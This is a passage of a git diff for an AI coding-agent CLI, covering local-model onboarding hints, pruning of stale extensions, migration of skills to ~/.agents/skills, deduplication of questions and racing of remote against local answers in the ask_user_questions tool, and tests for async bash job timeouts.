+
+  authStorage.set('ollama', { type: 'api_key', key: 'ollama' })
+  p.log.success(`${pc.green('Ollama (Local)')} saved — models will appear when Ollama is running`)
   return true
 }
 
@@ -451,10 +531,12 @@ async function runCustomOpenAIFlow(
   pc: PicoModule,
   authStorage: AuthStorage,
 ): Promise<boolean> {
+  p.log.info(pc.dim('Common endpoints:\n  Ollama:     http://localhost:11434/v1\n  LM Studio:  http://localhost:1234/v1\n  vLLM:       http://localhost:8000/v1'))
+
   // Prompt for base URL
   const baseUrl = await p.text({
     message: 'Base URL of your OpenAI-compatible endpoint:',
-    placeholder: 'https://my-proxy.example.com/v1',
+    placeholder: 'http://localhost:11434/v1',
     validate: (val) => {
       const trimmed = val?.trim()
       if (!trimmed) return 'Base URL is required'
@@ -535,6 +617,8 @@ async function runCustomOpenAIFlow(
   p.log.success(`Custom endpoint saved: ${pc.green(trimmedUrl)}`)
   p.log.info(`Model: ${pc.cyan(trimmedModelId)}`)
   p.log.info(`Config written to ${pc.dim(modelsJsonPath)}`)
+  p.log.info(`If you get role or streaming errors, add compat settings to models.json.`)
+  p.log.info(`See ${pc.dim('docs/providers.md#common-pitfalls')} for details.`)
   return true
 }
 
@@ -669,10 +753,12 @@ async function runRemoteQuestionsStep(
   pc: PicoModule,
   authStorage: AuthStorage,
 ): Promise<string | null> {
-  // Check existing config
-  const hasDiscord = authStorage.has('discord_bot') && !!(authStorage.get('discord_bot') as any)?.key
-  const hasSlack = authStorage.has('slack_bot') && !!(authStorage.get('slack_bot') as any)?.key
-  const hasTelegram = authStorage.has('telegram_bot') && !!(authStorage.get('telegram_bot') as any)?.key
+  // Check existing config — use getCredentialsForProvider to skip empty-key entries
+  const hasValidKey = (provider: string) =>
+    authStorage.getCredentialsForProvider(provider).some((c: any) => c.type === 'api_key' && c.key)
+  const hasDiscord = hasValidKey('discord_bot')
+  const hasSlack = hasValidKey('slack_bot')
+  const hasTelegram = hasValidKey('telegram_bot')
   const existingChannel = hasDiscord ? 'Discord' : hasSlack ? 'Slack' : hasTelegram ? 'Telegram' : null
 
   type RemoteOption = { value: string; label: string; hint?: string }
diff --git a/src/remote-questions-config.ts b/src/remote-questions-config.ts
index e7f0d8cae..7a66543a4 100644
--- a/src/remote-questions-config.ts
+++ b/src/remote-questions-config.ts
@@ -16,7 +16,7 @@ import { appRoot } from "./app-paths.js";
 // boundary — this file is compiled by tsc, but preferences.ts is loaded
 // via jiti at runtime. Importing it as .js fails because no .js exists
 // in dist/. See #592, #1110.
-const GLOBAL_PREFERENCES_PATH = join(appRoot, "preferences.md");
+const GLOBAL_PREFERENCES_PATH = join(appRoot, "PREFERENCES.md");
 
 export function saveRemoteQuestionsConfig(channel: "slack" | "discord" | "telegram", channelId: string): void {
   const prefsPath = GLOBAL_PREFERENCES_PATH;
diff --git a/src/resource-loader.ts b/src/resource-loader.ts
index 0571ac272..901d8e1b1 100644
--- a/src/resource-loader.ts
+++ b/src/resource-loader.ts
@@ -1,7 +1,7 @@
-import { DefaultResourceLoader } from '@gsd/pi-coding-agent'
+import { DefaultResourceLoader, sortExtensionPaths } from '@gsd/pi-coding-agent'
 import { createHash } from 'node:crypto'
 import { homedir } from 'node:os'
-import { chmodSync, copyFileSync, cpSync, existsSync, lstatSync, mkdirSync, readFileSync, readlinkSync, readdirSync, rmSync, statSync, symlinkSync, unlinkSync, writeFileSync } from 'node:fs'
+import { chmodSync, copyFileSync, cpSync, existsSync, lstatSync, mkdirSync, openSync, closeSync, readFileSync, readlinkSync, readdirSync, rmSync, statSync, symlinkSync, unlinkSync, writeFileSync } from 'node:fs'
 import { dirname, join, relative, resolve } from 'node:path'
 import { fileURLToPath } from 'node:url'
 import { compareSemver } from './update-check.js'
@@ -40,6 +40,12 @@ interface ManagedResourceManifest {
    * causing extension load errors.
    */
   installedExtensionRootFiles?: string[]
+  /**
+   * Subdirectory extension names installed in extensions/ by this GSD version.
+   * Used on the next upgrade to detect and prune subdirectory extensions that
+   * were removed from the bundle.
+   */
+  installedExtensionDirs?: string[]
 }
 
 export { discoverExtensionEntryPaths } from './extension-discovery.js'
@@ -67,14 +73,29 @@ function getBundledGsdVersion(): string {
 }
 
 function writeManagedResourceManifest(agentDir: string): void {
-  // Record root-level files currently in the bundled extensions source so that
-  // future upgrades can detect and prune any that get removed or moved.
+  // Record root-level files and subdirectory extension names currently in the
+  // bundled extensions source so that future upgrades can detect and prune any
+  // that get removed or moved.
   let installedExtensionRootFiles: string[] = []
+  let installedExtensionDirs: string[] = []
   try {
     if (existsSync(bundledExtensionsDir)) {
-      installedExtensionRootFiles = readdirSync(bundledExtensionsDir, { withFileTypes: true })
+      const entries = readdirSync(bundledExtensionsDir, { withFileTypes: true })
+      installedExtensionRootFiles = entries
         .filter(e => e.isFile())
         .map(e => e.name)
+      installedExtensionDirs = entries
+        .filter(e => e.isDirectory())
+        .filter(e => {
+          // Track directories that are actual extensions — identified by an
+          // index.js/index.ts entry point OR an extension-manifest.json (e.g.
+          // remote-questions which uses mod.ts instead of index.ts).
+          const dirPath = join(bundledExtensionsDir, e.name)
+          return existsSync(join(dirPath, 'index.js'))
+            || existsSync(join(dirPath, 'index.ts'))
+            || existsSync(join(dirPath, 'extension-manifest.json'))
+        })
+        .map(e => e.name)
     }
   } catch { /* non-fatal */ }
 
@@ -83,6 +104,7 @@ function writeManagedResourceManifest(agentDir: string): void {
     syncedAt: Date.now(),
     contentHash: computeResourceFingerprint(),
     installedExtensionRootFiles,
+    installedExtensionDirs,
   }
   writeFileSync(getManagedResourceManifestPath(agentDir), JSON.stringify(manifest))
 }
@@ -314,32 +336,58 @@ function pruneRemovedBundledExtensions(
 
   // Current bundled root-level files (what the new version provides)
   const currentSourceFiles = new Set<string>()
+  // Current bundled subdirectory extensions
+  const currentSourceDirs = new Set<string>()
   try {
     if (existsSync(bundledExtensionsDir)) {
       for (const e of readdirSync(bundledExtensionsDir, { withFileTypes: true })) {
         if (e.isFile()) currentSourceFiles.add(e.name)
+        if (e.isDirectory()) currentSourceDirs.add(e.name)
       }
     }
   } catch { /* non-fatal */ }
 
-  const removeIfStale = (fileName: string) => {
+  const removeFileIfStale = (fileName: string) => {
     if (currentSourceFiles.has(fileName)) return  // still in bundle, not stale
     const stale = join(extensionsDir, fileName)
     try { if (existsSync(stale)) rmSync(stale, { force: true }) } catch { /* non-fatal */ }
   }
 
+  const removeDirIfStale = (dirName: string) => {
+    if (currentSourceDirs.has(dirName)) return  // still in bundle, not stale
+    const stale = join(extensionsDir, dirName)
+    try { if (existsSync(stale)) rmSync(stale, { recursive: true, force: true }) } catch { /* non-fatal */ }
+  }
+
   if (manifest?.installedExtensionRootFiles) {
     // Manifest-based: remove previously-installed root files that are no longer bundled
     for (const prevFile of manifest.installedExtensionRootFiles) {
-      removeIfStale(prevFile)
+      removeFileIfStale(prevFile)
     }
   }
 
+  if (manifest?.installedExtensionDirs) {
+    // Manifest-based: remove previously-installed subdirectory extensions that are no longer bundled
+    for (const prevDir of manifest.installedExtensionDirs) {
+      removeDirIfStale(prevDir)
+    }
+  }
+
+  // Sweep-based: also remove any installed extension subdirectory not in the current bundle,
+  // even if it was never tracked in the manifest (e.g. installed by a pre-manifest version).
+  try {
+    if (existsSync(extensionsDir)) {
+      for (const e of readdirSync(extensionsDir, { withFileTypes: true })) {
+        if (e.isDirectory()) removeDirIfStale(e.name)
+      }
+    }
+  } catch { /* non-fatal */ }
+
   // Always remove known stale files regardless of manifest state.
   // These were installed by pre-manifest versions so they may not appear in
   // installedExtensionRootFiles even when a manifest exists.
   // env-utils.js was moved from extensions/ root → gsd/ in v2.39.x (#1634)
-  removeIfStale('env-utils.js')
+  removeFileIfStale('env-utils.js')
 }
 
 /**
@@ -347,9 +395,12 @@ function pruneRemovedBundledExtensions(
  *
  * - extensions/ → ~/.gsd/agent/extensions/   (overwrite when version changes)
  * - agents/     → ~/.gsd/agent/agents/        (overwrite when version changes)
- * - skills/     → ~/.gsd/agent/skills/        (overwrite when version changes)
  * - GSD-WORKFLOW.md → ~/.gsd/agent/GSD-WORKFLOW.md (fallback for env var miss)
  *
+ * Skills are NOT synced here. They are installed by the user via the
+ * skills.sh CLI (`npx skills add <repo>`) into ~/.agents/skills/ — the
+ * industry-standard Agent Skills ecosystem directory.
+ *
  * Skips the copy when the managed-resources.json version matches the current
  * GSD version, avoiding ~128ms of synchronous cpSync on every startup.
  * After `npm update -g @glittercowboy/gsd`, versions will differ and the
@@ -362,25 +413,31 @@ export function initResources(agentDir: string): void {
 
   const currentVersion = getBundledGsdVersion()
   const manifest = readManagedResourceManifest(agentDir)
+  const extensionsDir = join(agentDir, 'extensions')
 
   // Always prune root-level extension files that were removed from the bundle.
   // This is cheap (a few existence checks + at most one rmSync) and must run
   // unconditionally so that stale files left by a previous version are cleaned
   // up even when the version/hash match causes the full sync to be skipped.
   pruneRemovedBundledExtensions(manifest, agentDir)
+  pruneStaleSiblingFiles(bundledExtensionsDir, extensionsDir)
 
   // Ensure ~/.gsd/agent/node_modules symlinks to GSD's node_modules on EVERY
   // launch, not just during resource syncs. A stale/broken symlink makes ALL
   // extensions fail to resolve @gsd/* packages, rendering GSD non-functional.
   ensureNodeModulesSymlink(agentDir)
 
+  // Migrate legacy skills on every launch (not gated by manifest) so that
+  // partial-failure retries don't wait for a version bump.
+  migrateSkillsToEcosystemDir(agentDir)
+
   // Skip the full copy when both version AND content fingerprint match.
   // Version-only checks miss same-version content changes (npm link dev workflow,
   // hotfixes within a release). The content hash catches those at ~1ms cost.
   if (manifest && manifest.gsdVersion === currentVersion) {
     // Version matches — check content fingerprint for same-version staleness.
     const currentHash = computeResourceFingerprint()
-    const hasStaleExtensionFiles = hasStaleCompiledExtensionSiblings(join(agentDir, 'extensions'))
+    const hasStaleExtensionFiles = hasStaleCompiledExtensionSiblings(extensionsDir, bundledExtensionsDir)
     if (manifest.contentHash && manifest.contentHash === currentHash && !hasStaleExtensionFiles) {
       return
     }
@@ -390,7 +447,13 @@ export function initResources(agentDir: string): void {
 
   syncResourceDir(bundledExtensionsDir, join(agentDir, 'extensions'))
   syncResourceDir(join(resourcesDir, 'agents'), join(agentDir, 'agents'))
-  syncResourceDir(join(resourcesDir, 'skills'), join(agentDir, 'skills'))
+  // Skills are no longer force-synced here. Users install skills via the
+  // skills.sh CLI (`npx skills add <repo>`) into ~/.agents/skills/ which
+  // is the industry-standard Agent Skills ecosystem directory.
+  //
+  // Migration from the legacy ~/.gsd/agent/skills/ directory is handled
+  // above the manifest check so it runs on every launch (including retries
+  // after partial copy failures).
 
   // Sync GSD-WORKFLOW.md to agentDir as a fallback for when GSD_WORKFLOW_PATH
   // env var is not set (e.g. fork/dev builds, alternative entry points).
@@ -407,12 +470,129 @@ export function initResources(agentDir: string): void {
   ensureRegistryEntries(join(agentDir, 'extensions'))
 }
 
-export function hasStaleCompiledExtensionSiblings(extensionsDir: string): boolean {
+// ─── Legacy Skill Migration ──────────────────────────────────────────────────────
+
+/**
+ * One-time migration: copy user-customized skills from the old
+ * ~/.gsd/agent/skills/ directory into ~/.agents/skills/.
+ *
+ * The migration is conservative:
+ *  - Only skill directories containing a SKILL.md are considered.
+ *  - Copies, does not move — the old directory stays intact so downgrading
+ *    to a pre-migration GSD version still works.
+ *  - Collision-safe — if a skill name already exists in the target, the
+ *    existing ecosystem skill wins (user may have already installed a newer
+ *    version via skills.sh).
+ *  - Writes a `.migrated-to-agents` marker inside the legacy directory so
+ *    the migration runs at most once.
+ */
+function migrateSkillsToEcosystemDir(agentDir: string): void {
+  const legacyDir = join(agentDir, 'skills')
+  const markerPath = join(legacyDir, '.migrated-to-agents')
+
+  // Already migrated or no legacy dir — nothing to do
+  if (!existsSync(legacyDir)) return
+
+  // Atomic marker check — 'wx' fails if file already exists, preventing races
+  // when two GSD processes start simultaneously.
+  let markerFd: number
+  try {
+    markerFd = openSync(markerPath, 'wx')
+  } catch {
+    return // marker already exists (another process won the race, or already migrated)
+  }
+
+  try {
+    const ecosystemDir = join(homedir(), '.agents', 'skills')
+    mkdirSync(ecosystemDir, { recursive: true })
+
+    const entries = readdirSync(legacyDir, { withFileTypes: true })
+    let migrated = 0
+    let candidates = 0
+    for (const entry of entries) {
+      // Handle both real directories and symlinks pointing to directories
+      const isDir = entry.isDirectory()
+      const isSymlink = entry.isSymbolicLink()
+      if (!isDir && !isSymlink) continue
+
+      const sourcePath = join(legacyDir, entry.name)
+
+      // For symlinks, verify the target is a directory
+      if (isSymlink) {
+        try {
+          const stat = statSync(sourcePath)
+          if (!stat.isDirectory()) continue
+        } catch {
+          continue // broken symlink — skip
+        }
+      }
+
+      const skillMd = join(sourcePath, 'SKILL.md')
+      if (!existsSync(skillMd)) continue
+
+      const target = join(ecosystemDir, entry.name)
+      if (existsSync(target)) continue // ecosystem version wins
+
+      candidates++
+      try {
+        if (isSymlink) {
+          // Recreate the symlink in the ecosystem directory using an absolute
+          // target. Relative symlinks would resolve from the new parent dir
+          // (~/.agents/skills/) instead of the original (~/.gsd/agent/skills/),
+          // pointing to the wrong location.
+          const rawTarget = readlinkSync(sourcePath)
+          const absTarget = resolve(dirname(sourcePath), rawTarget)
+          symlinkSync(absTarget, target)
+        } else {
+          cpSync(sourcePath, target, { recursive: true })
+        }
+        migrated++
+      } catch {
+        // non-fatal — skip this skill
+      }
+    }
+
+    // If any skills failed to copy, remove the marker so migration retries
+    // on the next launch.  This keeps the legacy dir as fallback until every
+    // skill has been successfully migrated.
+    if (migrated < candidates) {
+      try { closeSync(markerFd); markerFd = -1 } catch { /* non-fatal */ }
+      try { unlinkSync(markerPath) } catch { /* non-fatal */ }
+      return
+    }
+
+    // Write migration info to the marker
+    try { writeFileSync(markerFd, `Migrated ${migrated} skill(s) to ${ecosystemDir} on ${new Date().toISOString()}\n`) } catch { /* non-fatal */ }
+  } catch {
+    // can't create ecosystem dir or read legacy dir — close fd first (required on Windows
+    // where unlinkSync fails on open handles), then remove marker so we retry next launch
+    try { closeSync(markerFd); markerFd = -1 } catch { /* non-fatal */ }
+    try { unlinkSync(markerPath) } catch { /* non-fatal */ }
+  } finally {
+    if (markerFd !== -1) { try { closeSync(markerFd) } catch { /* non-fatal */ } }
+  }
+}
+
+export function hasStaleCompiledExtensionSiblings(extensionsDir: string, sourceDir: string = bundledExtensionsDir): boolean {
   if (!existsSync(extensionsDir)) return false
+  const sourceFiles = existsSync(sourceDir)
+    ? new Set(
+        readdirSync(sourceDir, { withFileTypes: true })
+          .filter((entry) => entry.isFile())
+          .map((entry) => entry.name),
+      )
+    : new Set<string>()
   for (const entry of readdirSync(extensionsDir, { withFileTypes: true })) {
-    if (!entry.isFile() || !entry.name.endsWith('.ts')) continue
-    const jsName = entry.name.replace(/\.ts$/, '.js')
-    if (existsSync(join(extensionsDir, jsName))) {
+    if (!entry.isFile()) continue
+    if (!entry.name.endsWith('.ts') && !entry.name.endsWith('.js')) continue
+
+    const siblingName = entry.name.endsWith('.ts')
+      ? entry.name.replace(/\.ts$/, '.js')
+      : entry.name.replace(/\.js$/, '.ts')
+
+    if (!existsSync(join(extensionsDir, siblingName))) continue
+    if (sourceFiles.has(entry.name) && sourceFiles.has(siblingName)) continue
+    if (sourceFiles.has(entry.name) || sourceFiles.has(siblingName)) {
       return true
     }
   }
@@ -452,5 +632,22 @@ export function buildResourceLoader(agentDir: string): DefaultResourceLoader {
   return new DefaultResourceLoader({
     agentDir,
     additionalExtensionPaths: piExtensionPaths,
-  })
+    bundledExtensionKeys: bundledKeys,
+    extensionPathsTransform: (paths: string[]) => {
+      // 1. Filter community extensions through the GSD registry
+      const filteredPaths = paths.filter((entryPath) => {
+        const manifest = readManifestFromEntryPath(entryPath)
+        if (!manifest) return true // no manifest = always load
+        return isExtensionEnabled(registry, manifest.id)
+      })
+
+      // 2. Sort in topological dependency order
+      const { sortedPaths, warnings } = sortExtensionPaths(filteredPaths)
+
+      return {
+        paths: sortedPaths,
+        diagnostics: warnings.map((w) => w.message),
+      }
+    },
+  } as ConstructorParameters<typeof DefaultResourceLoader>[0])
 }
diff --git a/src/resources/GSD-WORKFLOW.md b/src/resources/GSD-WORKFLOW.md
index 8c819643f..ef0759969 100644
--- a/src/resources/GSD-WORKFLOW.md
+++ b/src/resources/GSD-WORKFLOW.md
@@ -18,7 +18,8 @@ Read these files in order and act on what they say:
 3. **`.gsd/milestones/<active>/M###-CONTEXT.md`** — Milestone-level project decisions, reference paths, constraints. Read this before doing implementation work.
 4. If a slice is active and has one, read **`S##-CONTEXT.md`** — Slice-specific decisions and constraints.
 5. If a slice is active, read its **`S##-PLAN.md`** — Which tasks exist? Which are done?
-6. If a task was interrupted, check for **`continue.md`** in the active slice directory — Resume from there.
+6. If `.gsd/CODEBASE.md` exists, skim it for fast structural orientation before broad code exploration.
+7. If a task was interrupted, check for **`continue.md`** in the active slice directory — Resume from there.
 
 Then do the thing `STATE.md` says to do next.
 
@@ -44,6 +45,7 @@ All artifacts live in `.gsd/` at the project root:
 .gsd/
   STATE.md                                  # Dashboard — always read first (derived cache; runtime, gitignored)
   DECISIONS.md                              # Append-only decisions register
+  CODEBASE.md                               # Generated codebase map cache (auto-refreshed by GSD)
   milestones/
     M001/
       M001-ROADMAP.md                       # Milestone plan (checkboxes = state)
diff --git a/src/resources/agents/researcher.md b/src/resources/agents/researcher.md
index 3c34ea0e3..ae8fba5da 100644
--- a/src/resources/agents/researcher.md
+++ b/src/resources/agents/researcher.md
@@ -1,7 +1,7 @@
 ---
 name: researcher
 description: Web researcher that finds and synthesizes current information using Brave Search
-tools: web_search, bash
+tools: search-the-web, bash
 ---
 
 You are a web researcher. You find current, accurate information using web search and synthesize it into a clear, well-structured report.
diff --git a/src/resources/extensions/ask-user-questions.ts b/src/resources/extensions/ask-user-questions.ts
index c227c1ad4..3cb7e2ae1 100644
--- a/src/resources/extensions/ask-user-questions.ts
+++ b/src/resources/extensions/ask-user-questions.ts
@@ -72,6 +72,100 @@ const AskUserQuestionsParams = Type.Object({
 	}),
 });
 
+// ─── Per-turn deduplication ──────────────────────────────────────────────────
+// Prevents duplicate question dispatches (especially to remote channels like
+// Discord) when the LLM calls ask_user_questions multiple times with the same
+// questions in a single turn. Keyed by full canonicalized payload (id, header,
+// question, options, allowMultiple) — not just IDs — so that calls with the
+// same IDs but different text/options are treated as distinct.
+
+import { createHash } from "node:crypto";
+
+interface CachedResult {
+	content: { type: "text"; text: string }[];
+	details: AskUserQuestionsDetails;
+}
+
+const turnCache = new Map<string, CachedResult>();
+
+/** @internal Exported for testing only. */
+export function questionSignature(questions: Question[]): string {
+	const canonical = questions
+		.map((q) => ({
+			id: q.id,
+			header: q.header,
+			question: q.question,
+			options: (q.options || []).map((o) => ({ label: o.label, description: o.description })),
+			allowMultiple: !!q.allowMultiple,
+		}))
+		.sort((a, b) => a.id.localeCompare(b.id));
+	return createHash("sha256").update(JSON.stringify(canonical)).digest("hex").slice(0, 16);
+}
+
+/** Reset the dedup cache. Called on session boundaries. */
+export function resetAskUserQuestionsCache(): void {
+	turnCache.clear();
+}
+
+// ─── Race helper ─────────────────────────────────────────────────────────────
+
+interface RaceableResult {
+	content: { type: "text"; text: string }[];
+	details?: unknown;
+}
+
+/**
+ * Race a remote channel dispatch against the local TUI. The first to produce
+ * a valid (non-error, non-timeout) result wins. The loser is cancelled via
+ * the shared AbortController.
+ *
+ * If the local TUI responds first, the remote poll is aborted (the message
+ * stays in Discord/Slack but polling stops). If remote responds first, the
+ * local TUI prompt is cancelled.
+ *
+ * Returns null only when both sides fail or are cancelled.
+ */
+async function raceRemoteAndLocal(
+	startRemote: () => Promise<RaceableResult | null>,
+	startLocal: () => Promise<RoundResult | null | undefined>,
+	controller: AbortController,
+	questions: Question[],
+): Promise<RaceableResult | null> {
+	// Wrap local TUI result into the same shape as remote results
+	const localPromise = startLocal().then((result): RaceableResult | null => {
+		if (!result || Object.keys(result.answers).length === 0) return null;
+		return {
+			content: [{ type: "text" as const, text: formatForLLM(result) }],
+			details: { questions, response: result, cancelled: false } satisfies LocalResultDetails,
+		};
+	}).catch(() => null);
+
+	const remotePromise = startRemote().then((result): RaceableResult | null => {
+		if (!result) return null;
+		const details = result.details as Record<string, unknown> | undefined;
+		// Treat timeouts and errors as non-wins — let the local TUI win instead
+		if (details?.timed_out || details?.error) return null;
+		return result;
+	}).catch(() => null);
+
+	// Race: first non-null result wins
+	const winner = await Promise.race([
+		localPromise.then((r) => r ? { source: "local" as const, result: r } : null),
+		remotePromise.then((r) => r ? { source: "remote" as const, result: r } : null),
+	]);
+
+	if (winner) {
+		// Cancel the loser
+		controller.abort();
+		return winner.result;
+	}
+
+	// First to resolve was null — wait for the other
+	const [localResult, remoteResult] = await Promise.all([localPromise, remotePromise]);
+	controller.abort();
+	return localResult ?? remoteResult;
+}
+
 // ─── Helpers ──────────────────────────────────────────────────────────────────
 
 const OTHER_OPTION_LABEL = "None of the above";
@@ -121,6 +215,16 @@ export default function AskUserQuestions(pi: ExtensionAPI) {
 		parameters: AskUserQuestionsParams,
 
 		async execute(_toolCallId, params, signal, _onUpdate, ctx) {
+			// ── Per-turn dedup: return cached result for identical question sets ──
+			const sig = questionSignature(params.questions);
+			const cached = turnCache.get(sig);
+			if (cached) {
+				return {
+					content: [{ type: "text" as const, text: cached.content[0].text + "\n(Returned cached answer — this question set was already asked this turn.)" }],
+					details: cached.details,
+				};
+			}
+
 			// Validation
 			if (params.questions.length === 0 || params.questions.length > 3) {
 				return errorResult("Error: questions must contain 1-3 items", params.questions);
@@ -135,10 +239,54 @@ export default function AskUserQuestions(pi: ExtensionAPI) {
 				}
 			}
 
-			if (!ctx.hasUI) {
-				const { tryRemoteQuestions } = await import("./remote-questions/manager.js");
+			// ── Routing: race remote + local, remote-only, or local-only ────────
+			const { tryRemoteQuestions, isRemoteConfigured } = await import("./remote-questions/manager.js");
+			const hasRemote = isRemoteConfigured();
+
+			// Case 1: Both remote and local UI available — race them.
+			// The first response wins; the loser is cancelled via AbortController.
+			if (hasRemote && ctx.hasUI) {
+				const raceController = new AbortController();
+				// Merge the parent signal so external cancellation propagates.
+				const onParentAbort = () => raceController.abort();
+				signal?.addEventListener("abort", onParentAbort, { once: true });
+				const raceSignal = raceController.signal;
+
+				const raceResult = await raceRemoteAndLocal(
+					() => tryRemoteQuestions(params.questions, raceSignal),
+					() => showInterviewRound(params.questions, { signal: raceSignal }, ctx as any),
+					raceController,
+					params.questions,
+				);
+
+				signal?.removeEventListener("abort", onParentAbort);
+
+				if (raceResult) {
+					const details = raceResult.details as Record<string, unknown> | undefined;
+					if (details && !details.timed_out && !details.error && !details.cancelled) {
+						turnCache.set(sig, raceResult as unknown as CachedResult);
+					}
+					return { ...raceResult, details: raceResult.details as unknown };
+				}
+				// Both sides failed/cancelled — fall through to error
+				return errorResult("ask_user_questions: no response received from local UI or remote channel", params.questions);
+			}
+
+			// Case 2: Remote configured but no local UI (headless) — remote only.
+			if (hasRemote && !ctx.hasUI) {
 				const remoteResult = await tryRemoteQuestions(params.questions, signal);
-				if (remoteResult) return { ...remoteResult, details: remoteResult.details as unknown };
+				if (remoteResult) {
+					const remoteDetails = remoteResult.details as Record<string, unknown> | undefined;
+					if (remoteDetails && !remoteDetails.timed_out && !remoteDetails.error) {
+						turnCache.set(sig, remoteResult as unknown as CachedResult);
+					}
+					return { ...remoteResult, details: remoteResult.details as unknown };
+				}
+				return errorResult("Error: remote channel configured but returned no result", params.questions);
+			}
+
+			// Case 3: No remote — local UI only.
+			if (!ctx.hasUI) {
 				return errorResult("Error: UI not available (non-interactive mode)", params.questions);
 			}
 
@@ -162,9 +310,27 @@ export default function AskUserQuestions(pi: ExtensionAPI) {
 					if (selected === undefined) {
 						return errorResult("ask_user_questions was cancelled", params.questions);
 					}
-					answers[q.id] = {
-						answers: Array.isArray(selected) ? selected : [selected],
-					};
+
+					// When the user picks "None of the above" on a single-select
+					// question, prompt for a free-text explanation so they are not
+					// trapped in a re-asking loop (bug #2715).
+					let freeTextNote = "";
+					const selectedStr = Array.isArray(selected) ? selected[0] : selected;
+					if (!q.allowMultiple && selectedStr === OTHER_OPTION_LABEL) {
+						const note = await ctx.ui.input(
+							`${q.header}: Please explain in your own words`,
+							"Type your answer here…",
+						);
+						if (note) {
+							freeTextNote = note;
+						}
+					}
+
+					const answerList = Array.isArray(selected) ? selected : [selected];
+					if (freeTextNote) {
+						answerList.push(`user_note: ${freeTextNote}`);
+					}
+					answers[q.id] = { answers: answerList };
 				}
 				const roundResult: RoundResult = {
 					endInterview: false,
@@ -175,7 +341,7 @@ export default function AskUserQuestions(pi: ExtensionAPI) {
 						]),
 					),
 				};
-				return {
+				const fallbackResult = {
 					content: [{ type: "text" as const, text: JSON.stringify({ answers }) }],
 					details: {
 						questions: params.questions,
@@ -183,6 +349,8 @@ export default function AskUserQuestions(pi: ExtensionAPI) {
 						cancelled: false,
 					} satisfies LocalResultDetails,
 				};
+				turnCache.set(sig, fallbackResult);
+				return fallbackResult;
 			}
 
 			// Check if cancelled (empty answers = user exited)
@@ -194,10 +362,12 @@ export default function AskUserQuestions(pi: ExtensionAPI) {
 				};
 			}
 
-			return {
-				content: [{ type: "text", text: formatForLLM(result) }],
+			const successResult = {
+				content: [{ type: "text" as const, text: formatForLLM(result) }],
 				details: { questions: params.questions, response: result, cancelled: false } satisfies LocalResultDetails,
 			};
+			turnCache.set(sig, successResult);
+			return successResult;
 		},
 
 		// ─── Rendering ────────────────────────────────────────────────────────
diff --git a/src/resources/extensions/async-jobs/async-bash-timeout.test.ts b/src/resources/extensions/async-jobs/async-bash-timeout.test.ts
new file mode 100644
index 000000000..3ab48424d
--- /dev/null
+++ b/src/resources/extensions/async-jobs/async-bash-timeout.test.ts
@@ -0,0 +1,122 @@
+/**
+ * async-bash-timeout.test.ts — Tests for async_bash timeout behavior.
+ *
+ * Reproduces issue #2186: when an async bash job exceeds its timeout and
+ * the child process ignores SIGTERM, the promise hangs indefinitely.
+ * The fix adds a SIGKILL fallback and a hard deadline that force-resolves
+ * the promise so execution can continue.
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import { createAsyncBashTool } from "./async-bash-tool.ts";
+import { AsyncJobManager } from "./job-manager.ts";
+
+function getTextFromResult(result: { content: Array<{ type: string; text?: string }> }): string {
+	return result.content.map((c) => c.text ?? "").join("\n");
+}
+
+const noopSignal = new AbortController().signal;
+
+test("async_bash with timeout resolves even if process ignores SIGTERM", async () => {
+	const manager = new AsyncJobManager();
+	const tool = createAsyncBashTool(() => manager, () => process.cwd());
+
+	// Start a job that traps SIGTERM (ignores it), with a 2s timeout.
+	// The process installs a SIGTERM trap and sleeps for 60s.
+	// Before the fix, this would hang forever because SIGTERM is ignored
+	// and the close event never fires.
+	const result = await tool.execute(
+		"tc-timeout",
+		{
+			command: "trap '' TERM; sleep 60",
+			timeout: 2,
+			label: "sigterm-resistant",
+		},
+		noopSignal,
+		() => {},
+		undefined as never,
+	);
+
+	const text = getTextFromResult(result);
+	assert.match(text, /sigterm-resistant/);
+
+	const jobId = text.match(/\*\*(bg_[a-f0-9]+)\*\*/)?.[1];
+	assert.ok(jobId, "Should have returned a job ID");
+
+	// Now await the job — it should resolve within a reasonable time
+	// (timeout 2s + SIGKILL grace 5s + buffer = well under 15s)
+	const start = Date.now();
+	const job = manager.getJob(jobId)!;
+	assert.ok(job, "Job should exist");
+
+	await Promise.race([
+		job.promise,
+		new Promise<never>((_, reject) => {
+			const t = setTimeout(() => reject(new Error(
+				`Job promise hung for ${Date.now() - start}ms — ` +
+				`this is the bug from issue #2186: timeout hangs indefinitely`,
+			)), 15_000);
+			if (typeof t === "object" && "unref" in t) t.unref();
+		}),
+	]);
+
+	const elapsed = Date.now() - start;
+	// Should have resolved well within 15s (timeout 2s + kill grace ~5s)
+	assert.ok(elapsed < 15_000, `Job took ${elapsed}ms — expected <15s`);
+
+	// Job should have completed (resolved, not rejected) with timeout message
+	assert.ok(
+		job.status === "completed" || job.status === "failed",
+		`Job status should be completed or failed, got: ${job.status}`,
+	);
+
+	if (job.status === "completed") {
+		assert.ok(
+			job.resultText?.includes("timed out") || job.resultText?.includes("Timed out"),
+			`Result should mention timeout, got: ${job.resultText}`,
+		);
+	}
+
+	manager.shutdown();
+});
+
+test("async_bash with timeout resolves normally when process exits on SIGTERM", async () => {
+	const manager = new AsyncJobManager();
+	const tool = createAsyncBashTool(() => manager, () => process.cwd());
+
+	// Start a normal sleep that will die on SIGTERM, with a 1s timeout
+	const result = await tool.execute(
+		"tc-normal-timeout",
+		{
+			command: "sleep 60",
+			timeout: 1,
+			label: "normal-timeout",
+		},
+		noopSignal,
+		() => {},
+		undefined as never,
+	);
+
+	const text = getTextFromResult(result);
+	const jobId = text.match(/\*\*(bg_[a-f0-9]+)\*\*/)?.[1];
+	assert.ok(jobId, "Should have returned a job ID");
+
+	const job = manager.getJob(jobId)!;
+	const start = Date.now();
+
+	await Promise.race([
+		job.promise,
+		new Promise<never>((_, reject) => {
+			const t = setTimeout(() => reject(new Error("Job hung")), 10_000);
+			if (typeof t === "object" && "unref" in t) t.unref();
+		}),
+	]);
+
+	const elapsed = Date.now() - start;
+	assert.ok(elapsed < 5_000, `Expected quick resolution after SIGTERM, took ${elapsed}ms`);
+	assert.equal(job.status, "completed");
+	assert.ok(job.resultText?.includes("timed out"), `Should mention timeout: ${job.resultText}`);
+
+	manager.shutdown();
+});
diff --git a/src/resources/extensions/async-jobs/async-bash-tool.ts b/src/resources/extensions/async-jobs/async-bash-tool.ts
index b20a78b7b..034fd207e 100644
--- a/src/resources/extensions/async-jobs/async-bash-tool.ts
+++ b/src/resources/extensions/async-jobs/async-bash-tool.ts
@@ -14,12 +14,13 @@ import {
 	DEFAULT_MAX_LINES,
